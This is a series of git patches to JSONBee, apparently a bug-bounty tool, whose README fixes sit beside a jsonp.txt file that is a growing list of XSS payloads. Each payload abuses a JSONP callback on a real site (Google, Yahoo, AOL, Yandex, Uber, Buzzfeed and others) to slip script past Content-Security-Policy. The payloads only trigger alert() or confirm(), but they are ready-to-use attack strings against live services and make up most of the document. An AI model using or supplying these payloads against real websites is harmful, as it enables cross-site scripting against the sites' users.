From d97ffd2eecadae58db80121efc5a100f557f87fa Mon Sep 17 00:00:00 2001
From: zigoo0 <zigoo0@users.noreply.github.com>
Date: Fri, 11 Jan 2019 09:22:15 +0100
Subject: [PATCH 01/11] Update README.md

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 5d80108..86ff68f 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,7 @@
 # JSONBee
 A ready to use JSONP endpoints to help bypass content security policy of different websites.
 
-The tool was presented during HackIT 2018 in Keiv. The presentation can be found here (not sure why format of the slides is screwed :D): https://www.slideshare.net/Hacken_Ecosystem/ebrahem-hegazy-bug-hunters-manual-for-bypassing-contentsecuritypolicy
+The tool was presented during HackIT 2018 in Kiev. The presentation can be found here (not sure why format of the slides is screwed :D): https://www.slideshare.net/Hacken_Ecosystem/ebrahem-hegazy-bug-hunters-manual-for-bypassing-contentsecuritypolicy
 
 # What is JSONBee?
 

From 46231e2ff97b4ee29ea3279599ee2195e6c349c7 Mon Sep 17 00:00:00 2001
From: zigoo0 <zigoo0@users.noreply.github.com>
Date: Fri, 11 Jan 2019 09:23:52 +0100
Subject: [PATCH 02/11] Update README.md

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 86ff68f..0ff0c34 100644
--- a/README.md
+++ b/README.md
@@ -5,7 +5,7 @@ The tool was presented during HackIT 2018 in Kiev. The presentation can be found
 
 # What is JSONBee?
 
-The main idea behind this tool is to find the JSONP endpoint(s) that would help you bypass content security policy for your target website in an automated way. JSONBee takes an input of a url name (i.e. https://www.facebook.com), parses the CSP (Content-Security Policy), and automatically suggest the XSS payload that would bypass the CSP. It mainly focuses on JSONP endpoints gathered during my bug bounty hunting activities, and could be used to bypass the CSP.
+The main idea behind this tool is to find the JSONP endpoint(s) that would help you bypass content security policy for your target website in an automated way. JSONBee takes an input of a url name (i.e. https://www.facebook.com), parses the CSP (Content-Security-Policy), and automatically suggest the XSS payload that would bypass the CSP. It mainly focuses on JSONP endpoints gathered during my bug bounty hunting activities, and could be used to bypass the CSP.
 
 JSONBee relies on 3 methods to gather the JSONP endpoints:
 * The repository within this project;

From 80626ed5e7455753489cd444cd8dd9595abff51d Mon Sep 17 00:00:00 2001
From: zigoo0 <zigoo0@users.noreply.github.com>
Date: Sun, 10 Feb 2019 20:17:03 +0100
Subject: [PATCH 03/11] Update jsonp.txt

Added a new Yahoo CB URL
---
 jsonp.txt | 1 +
 1 file changed, 1 insertion(+)

diff --git a/jsonp.txt b/jsonp.txt
index 58ec2fa..84743b7 100644
--- a/jsonp.txt
+++ b/jsonp.txt
@@ -28,6 +28,7 @@
 "><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>
 "><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>
 "><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>
+">x<script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?locale=en_us&agentVersion=205&adTrackingEnabled=true&adUnitCode=2e268534-d01b-4616-83cd-709bd90690e1&apiKey=P3VYQ352GKX74CFTRH7X&gdpr=false&euconsent=&publisherUrl=https%3A%2F%2Fwww.autoblog.com&cb=alert();"></script>
 "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
 "><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>
 "><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>

From 36c72ba47c156f11eed2ff42b402bd9ced763f38 Mon Sep 17 00:00:00 2001
From: zigoo0 <zigoo0@users.noreply.github.com>
Date: Sun, 15 Sep 2019 01:42:18 +0200
Subject: [PATCH 04/11] Adding www.google.com to the list

---
 jsonp.txt | 21 +++++++++++----------
 1 file changed, 11 insertions(+), 10 deletions(-)

diff --git a/jsonp.txt b/jsonp.txt
index 84743b7..0e089cc 100644
--- a/jsonp.txt
+++ b/jsonp.txt
@@ -1,18 +1,19 @@
 #Google.com:
-"><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
-"><script+src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
-"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
-"><script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
+"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
+"><script src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
+"><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
+"><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
+"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
 #Blogger.com:
-"><script+src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
+"><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
 #Yandex:
-"><script+src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
-"><script+src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script>
+"><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
+"><script src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script>
 #VK.com:
-"><script+src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script>
+"><script src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script>
 #Marketo.com
-"><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
-"><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
+"><script src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
+"><script src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
 #AlibabaGroup:
 "><script+src="https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)"></script>
 "><script+src="https://suggest.taobao.com/sug?callback=alert(1337)"></script>

From cbfa3314080e9cea7278be51dbab9f50de44af0e Mon Sep 17 00:00:00 2001
From: Ebrahem Hegazy <zigoo0@users.noreply.github.com>
Date: Tue, 22 Oct 2019 22:12:35 +0200
Subject: [PATCH 05/11] Adding Yahoo.com

Adding Yahoo.com
---
 jsonp.txt | 1 +
 1 file changed, 1 insertion(+)

diff --git a/jsonp.txt b/jsonp.txt
index 0e089cc..30379b2 100644
--- a/jsonp.txt
+++ b/jsonp.txt
@@ -30,6 +30,7 @@
 "><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>
 "><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>
 ">x<script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?locale=en_us&agentVersion=205&adTrackingEnabled=true&adUnitCode=2e268534-d01b-4616-83cd-709bd90690e1&apiKey=P3VYQ352GKX74CFTRH7X&gdpr=false&euconsent=&publisherUrl=https%3A%2F%2Fwww.autoblog.com&cb=alert();"></script>
+"><script src="https://search.yahoo.com/sugg/gossip/gossip-us-ura/?f=1&.crumb=wYtclSpdh3r&output=sd1&command=&pq=&l=1&bm=3&appid=exp-ats1.l7.search.vip.ir2.yahoo.com&t_stmp=1571806738592&nresults=10&bck=1he6d8leq7ddu%26b%3D3%26s%3Dcb&csrcpvid=8wNpljk4LjEYuM1FXaO1vgNfMTk1LgAAAAA5E2a9&vtestid=&mtestid=&spaceId=1197804867&callback=confirm"></script>
 "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
 "><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>
 "><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>

From e353ccaa613911164343ef569364da3b5fd70189 Mon Sep 17 00:00:00 2001
From: Ebrahem Hegazy <zigoo0@users.noreply.github.com>
Date: Mon, 28 Oct 2019 14:34:58 +0100
Subject: [PATCH 06/11] Added Buzzfeed.com

Added Buzzfeed.com
---
 jsonp.txt | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/jsonp.txt b/jsonp.txt
index 30379b2..19dbbfb 100644
--- a/jsonp.txt
+++ b/jsonp.txt
@@ -24,6 +24,8 @@
 "><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script>
 #Uber.com:
 "><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script>
+#Buzzfeed.com
+https://mango.buzzfeed.com/polls/service/editorial/post?poll_id=121996521&result_id=1&callback=alert(1)%2f%2f
 #AOL/Yahoo
 "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
 "><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>

From 1a518ddf695ae3093ff637c5958802715e890d88 Mon Sep 17 00:00:00 2001
From: Ebrahem Hegazy <zigoo0@users.noreply.github.com>
Date: Tue, 5 Nov 2019 14:38:35 +0100
Subject: [PATCH 07/11] Adding Yahoo JP

Adding Yahoo JP
---
 jsonp.txt | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/jsonp.txt b/jsonp.txt
index 19dbbfb..7d74370 100644
--- a/jsonp.txt
+++ b/jsonp.txt
@@ -25,7 +25,10 @@
 #Uber.com:
 "><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script>
 #Buzzfeed.com
-https://mango.buzzfeed.com/polls/service/editorial/post?poll_id=121996521&result_id=1&callback=alert(1)%2f%2f
+"><script src="https://mango.buzzfeed.com/polls/service/editorial/post?poll_id=121996521&result_id=1&callback=alert(1)%2f%2f"></script>
+#Yahoo JP (Thanks to @nizam0906)
+"><script src=https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)//></script>
+"><script src=https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1337)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-></script>
 #AOL/Yahoo
 "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
 "><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>

From d11db66d9dff0f0844c40567fc6c42af5e00fdd9 Mon Sep 17 00:00:00 2001
From: Ebrahem Hegazy <zigoo0@users.noreply.github.com>
Date: Wed, 23 Feb 2022 12:01:11 +0200
Subject: [PATCH 08/11] Removing a patched app

---
 jsonp.txt | 1 -
 1 file changed, 1 deletion(-)

diff --git a/jsonp.txt b/jsonp.txt
index 7d74370..4ac7018 100644
--- a/jsonp.txt
+++ b/jsonp.txt
@@ -49,7 +49,6 @@
 "><script+src="https://passport.ngs.ru/ajax/check?callback=alert(1337)"></script>
 "><script+src="https://ulogin.ru/token.php?callback=alert(1337)"></script>
 "><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script>
-"><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback=alert(1337)"></script>
 "><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)"></script>
 "><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)"></script>
 "><script+src="https://api.mixpanel.com/track/?callback=alert(1337)"></script>

From e106db204fdc436be9f9913c2a5b5b62b6f6af22 Mon Sep 17 00:00:00 2001
From: Ebrahem Hegazy <zigoo0@users.noreply.github.com>
Date: Wed, 23 Feb 2022 12:02:22 +0200
Subject: [PATCH 09/11] JSONP endpoints and payloads

---
 jsonp.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/jsonp.txt b/jsonp.txt
index 4ac7018..17493f5 100644
--- a/jsonp.txt
+++ b/jsonp.txt
@@ -55,7 +55,7 @@
 "><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)"></script>
 "><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json"></script>
 "><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38"></script>
-#GoogleAPI's
+#Google API's
 "><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
 "><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
 ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>

From 332486bea44697a22307a0f2618babdb8aaefbe8 Mon Sep 17 00:00:00 2001
From: PinkDraconian <vanroeyrobbe@hotmail.com>
Date: Tue, 3 Oct 2023 15:02:51 +0200
Subject: [PATCH 10/11] Added translate.googleapis.com

Added a JSONP endpoint for translate.googleapis.com
---
 jsonp.txt | 1 +
 1 file changed, 1 insertion(+)

diff --git a/jsonp.txt b/jsonp.txt
index 17493f5..86a7dc9 100644
--- a/jsonp.txt
+++ b/jsonp.txt
@@ -59,3 +59,4 @@
 "><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
 "><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
 ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
+"><script src="https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();"></script>

From e5b3728b1bb20ac2b10d35ca9798f099ef473f9b Mon Sep 17 00:00:00 2001
From: Maltemo <Maltemo@users.noreply.github.com>
Date: Thu, 5 Oct 2023 11:51:43 +0200
Subject: [PATCH 11/11] Adding maps.googleapis.com endpoint

---
 jsonp.txt | 1 +
 1 file changed, 1 insertion(+)

diff --git a/jsonp.txt b/jsonp.txt
index 17493f5..d795c72 100644
--- a/jsonp.txt
+++ b/jsonp.txt
@@ -4,6 +4,7 @@
 "><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
 "><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
 "><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
+"><script src="https://maps.googleapis.com/maps/api/js?key=[REPLACE_BY_GOOGLE_API_KEY_FROM_CURRENT_WEBSITE]&callback=alert(1337)"></script>
 #Blogger.com:
 "><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
 #Yandex: